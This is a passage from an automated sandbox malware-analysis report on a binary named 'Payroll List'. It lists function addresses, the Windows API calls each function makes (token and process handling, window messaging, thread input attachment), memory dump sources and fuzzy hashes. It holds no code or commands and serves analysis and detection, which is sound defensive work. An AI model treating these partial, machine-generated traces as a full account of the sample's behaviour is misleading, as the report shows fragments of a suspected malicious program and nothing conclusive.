                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0015B247
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                    • String ID:
                                                                    • API String ID: 4217664535-0
                                                                    • Opcode ID: 0177b2937c48c57ffb7de9aa4b3c95ef4a152082ab50b62f0ec2f0a871a8b477
                                                                    • Instruction ID: 53507f2aa4e37cebb0a1a10246d35ef293a8607350e8040c05d7fff44bb9db30
                                                                    • Opcode Fuzzy Hash: 0177b2937c48c57ffb7de9aa4b3c95ef4a152082ab50b62f0ec2f0a871a8b477
                                                                    • Instruction Fuzzy Hash: 4B119171A04205EFDB049F94ED85AAEB7A9EF85305F14802DE9539B650D731AE88CB20
                                                                    Function 0015B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0015B498
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4AA
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4C0
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 5a374859c28a992cd969cf3c52e971f8c4defb6280221e53172b35a0e0e6129b
                                                                    • Instruction ID: 181b96450487975716bc345c452d1a74d97326821cb7ac3d1740cf900c0c9b37
                                                                    • Opcode Fuzzy Hash: 5a374859c28a992cd969cf3c52e971f8c4defb6280221e53172b35a0e0e6129b
                                                                    • Instruction Fuzzy Hash: 5C115A7A900218FFDB21DFA8C885E9DBBB4FB08700F204091EA15BB290D771AE10DB94
                                                                    Function 0013B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0013B5A5
                                                                    • GetClientRect.USER32(?,?), ref: 0019E69A
                                                                    • GetCursorPos.USER32(?), ref: 0019E6A4
                                                                    • ScreenToClient.USER32(?,?), ref: 0019E6AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: e1d8463b2bd659345fb6c288e019a8fbc1189db69bd14c51c6790b54f247de78
                                                                    • Instruction ID: 5207cc7d90f1160a6d961f4462febba28461ef8b4f34b82a2d01908d1c528020
                                                                    • Opcode Fuzzy Hash: e1d8463b2bd659345fb6c288e019a8fbc1189db69bd14c51c6790b54f247de78
                                                                    • Instruction Fuzzy Hash: 6E115A71A00129BFCF10DF94DC858EE77B8EF0A304F000451FA02E7540E334AA81CBA1
                                                                    Function 0016732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00167352
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00167385
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0016739B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001673A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: aac207a178d2723626ff03b3af93d64d2828609c90a7699d25ac7a80522e9d9e
                                                                    • Instruction ID: 55efa80d69c5b94c0e494ed82243e20ff811e4011419b9af33b917de42e207d7
                                                                    • Opcode Fuzzy Hash: aac207a178d2723626ff03b3af93d64d2828609c90a7699d25ac7a80522e9d9e
                                                                    • Instruction Fuzzy Hash: E71104B2A04245AFC7019BA8EC49AAE7BADAB45324F144315F925E37A1D7708D908BA0
                                                                    Function 0013D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                    • GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 90a62097a86a7af49a02383e47f8eeff1d09b0c01394468265e24eaa3397fa6e
                                                                    • Instruction ID: 966b349f981f34a5dffe93693cd48819613383179e7c2f65d3b703ffbd70f2f5
                                                                    • Opcode Fuzzy Hash: 90a62097a86a7af49a02383e47f8eeff1d09b0c01394468265e24eaa3397fa6e
                                                                    • Instruction Fuzzy Hash: 4611AD72501509BFEF164FA0FC50EEABB69FF19364F050115FA0552450D731DDA09BA0
                                                                    Function 00154DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction ID: 8e3c6d0223a69f39136860aa2330b9b681448e0eeb2f6e2d412898ed37e18bd7
                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction Fuzzy Hash: FD014E3200014AFBCF165E84DC568EE3F23FB18356B598455FE2859131D33ADAB5AB81
                                                                    Function 00147452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00147A0D: __getptd_noexit.LIBCMT ref: 00147A0E
                                                                    • __lock.LIBCMT ref: 0014748F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 001474AC
                                                                    • _free.LIBCMT ref: 001474BF
                                                                    • InterlockedIncrement.KERNEL32(00D245D0), ref: 001474D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 2704283638-0
                                                                    • Opcode ID: 712ba64591e19171f872a7b3df9d7ced66676d32d698c7d04f6d08f33f1ee1c0
                                                                    • Instruction ID: 437694cdae4f23014865fb92268d3e1cbefa3a69d2f7c95996b712885c459843
                                                                    • Opcode Fuzzy Hash: 712ba64591e19171f872a7b3df9d7ced66676d32d698c7d04f6d08f33f1ee1c0
                                                                    • Instruction Fuzzy Hash: C901563590AA11ABD712EF64A50576DBB60BF15710F194006F41477AF0CB345981CFD6
                                                                    Function 00147A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00147AD8
                                                                      • Part of subcall function 00147CF4: __mtinitlocknum.LIBCMT ref: 00147D06
                                                                      • Part of subcall function 00147CF4: EnterCriticalSection.KERNEL32(00000000,?,00147ADD,0000000D), ref: 00147D1F
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00147AE5
                                                                    • __lock.LIBCMT ref: 00147AF9
                                                                    • ___addlocaleref.LIBCMT ref: 00147B17
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1687444384-0
                                                                    • Opcode ID: f1970cdcfda1658320eb4957c14c5c08ba4a0c68e57216e07813663559a1adcf
                                                                    • Instruction ID: 039d36747b556d3f2339eea11e106eac7c36586e110d82d28f6613783587f9e6
                                                                    • Opcode Fuzzy Hash: f1970cdcfda1658320eb4957c14c5c08ba4a0c68e57216e07813663559a1adcf
                                                                    • Instruction Fuzzy Hash: 38016971505B00EFD720DF75D90674ABBF0EF60325F20890EE49A976E0CBB0A680CB42
                                                                    Function 0018E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018E33D
                                                                    • _memset.LIBCMT ref: 0018E34C
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3D00,001E3D44), ref: 0018E37B
                                                                    • CloseHandle.KERNEL32 ref: 0018E38D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: e099abf2ca022ab217a400eb07d307987d67a87993948d9b036a100b65bf7b9a
                                                                    • Instruction ID: 3abfffd9d8718afbccf2ca926d1ac50d30fb65db7d200a345c11f52d3c8f96d8
                                                                    • Opcode Fuzzy Hash: e099abf2ca022ab217a400eb07d307987d67a87993948d9b036a100b65bf7b9a
                                                                    • Instruction Fuzzy Hash: 8DF0B4F05003447AE2012BE1AC49F7B7E5DFB09750F404021BF04EB5A2D3715E4086A4
                                                                    Function 0018EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                      • Part of subcall function 0013AF83: BeginPath.GDI32(?), ref: 0013B009
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EA8E
                                                                    • LineTo.GDI32(00000000,?,?), ref: 0018EA9B
                                                                    • EndPath.GDI32(00000000), ref: 0018EAAB
                                                                    • StrokePath.GDI32(00000000), ref: 0018EAB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 2cb06deafbc58465a90964a0a91d1338361f04126b77a3968e03a6431221d58c
                                                                    • Instruction ID: ada475924383a3a0e30e4a413434ecc33d9fcb2aad720decde2ce0a0c67f6cf5
                                                                    • Opcode Fuzzy Hash: 2cb06deafbc58465a90964a0a91d1338361f04126b77a3968e03a6431221d58c
                                                                    • Instruction Fuzzy Hash: 2EF08231005659BBDB12AF94BD0DFCE3F59AF1B711F044101FA12658E187B456A2CB95
                                                                    Function 0015C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015C84A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0015C85D
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0015C864
                                                                    • AttachThreadInput.USER32(00000000), ref: 0015C86B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: e59e5807f0033bf0ab3bd6b81355bb9d3cae1716d4363fae12da52b60faca79d
                                                                    • Instruction ID: 7afcbe317de88095649ca7a3526a20ec43aed9b55cb6fda887a29f2bbf3701dc
                                                                    • Opcode Fuzzy Hash: e59e5807f0033bf0ab3bd6b81355bb9d3cae1716d4363fae12da52b60faca79d
                                                                    • Instruction Fuzzy Hash: 01E03971141628BADB201FA2AC0DEDB7F5CEF167A2F408021BA1E88861C7B18584CBE0
                                                                    Function 0015B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0015B0D6
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0DD
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0015AC9D), ref: 0015B0EA
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: 6bf2b1d4c8969e170b96dfce4eeadc8c28a0fb07a70a486939d91e987463fdd9
                                                                    • Instruction ID: 19069ee188362b0221443feddd3dc0d9448805e7c3e6a528b33f822f590e1b3e
                                                                    • Opcode Fuzzy Hash: 6bf2b1d4c8969e170b96dfce4eeadc8c28a0fb07a70a486939d91e987463fdd9
                                                                    • Instruction Fuzzy Hash: DAE08672601211EBD7201FB16D0DB473BA8EF56792F018818F653DA880DB348486C760
                                                                    Function 0013B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0013B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0013B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0013B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0013B4BD
                                                                    • GetWindowDC.USER32(?,00000000), ref: 0019DE2B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019DE38
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0019DE51
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0019DE6A
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0019DE8A
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019DE95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: f50a1130fc4ee024d5f86b8dfdcfca6165714857841eed4bc9b466def6af7458
                                                                    • Instruction ID: 4704dce707ac7d66db0e783178a978f43ed873b19f9ec45210250dc4a4055135
                                                                    • Opcode Fuzzy Hash: f50a1130fc4ee024d5f86b8dfdcfca6165714857841eed4bc9b466def6af7458
                                                                    • Instruction Fuzzy Hash: 7BE0ED71504640AEDF215F74BC49BD83B11AB52335F14C666F66A588E2C77145C1DB11
                                                                    Function 0019B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 3000ae026fc23f6bd2af963b339878bf2fa6ff418d44c72e5106f8b8c3730a49
                                                                    • Instruction ID: 6d680134118b454880e15ce89fede85f16538171d72ce8dd4ded7a4b51bd3b06
                                                                    • Opcode Fuzzy Hash: 3000ae026fc23f6bd2af963b339878bf2fa6ff418d44c72e5106f8b8c3730a49
                                                                    • Instruction Fuzzy Hash: C3E046B1500704EFDB005FB0E848A2E7BA8EB4D360F12C80AFC5F8BA10CB7498808B40
                                                                    Function 0015B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0015B2DF
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0015B2EB
                                                                    • CloseHandle.KERNEL32(?), ref: 0015B2F4
                                                                    • CloseHandle.KERNEL32(?), ref: 0015B2FC
                                                                      • Part of subcall function 0015AB24: GetProcessHeap.KERNEL32(00000000,?,0015A848), ref: 0015AB2B
                                                                      • Part of subcall function 0015AB24: HeapFree.KERNEL32(00000000), ref: 0015AB32
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: b544e45f732c4837e32b75128a0cf990284dcbd8a8b6102ba4ec234f4c152a40
                                                                    • Instruction ID: fc24dc1447264f6a2b12cfe967827e16dce1a6f0966460cf5c6ad95d399db281
                                                                    • Opcode Fuzzy Hash: b544e45f732c4837e32b75128a0cf990284dcbd8a8b6102ba4ec234f4c152a40
                                                                    • Instruction Fuzzy Hash: 94E02F7A104405BBDB016B95EC09859FB76FF993213108621F62681D75CB3294B1EB91
                                                                    Function 0019B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
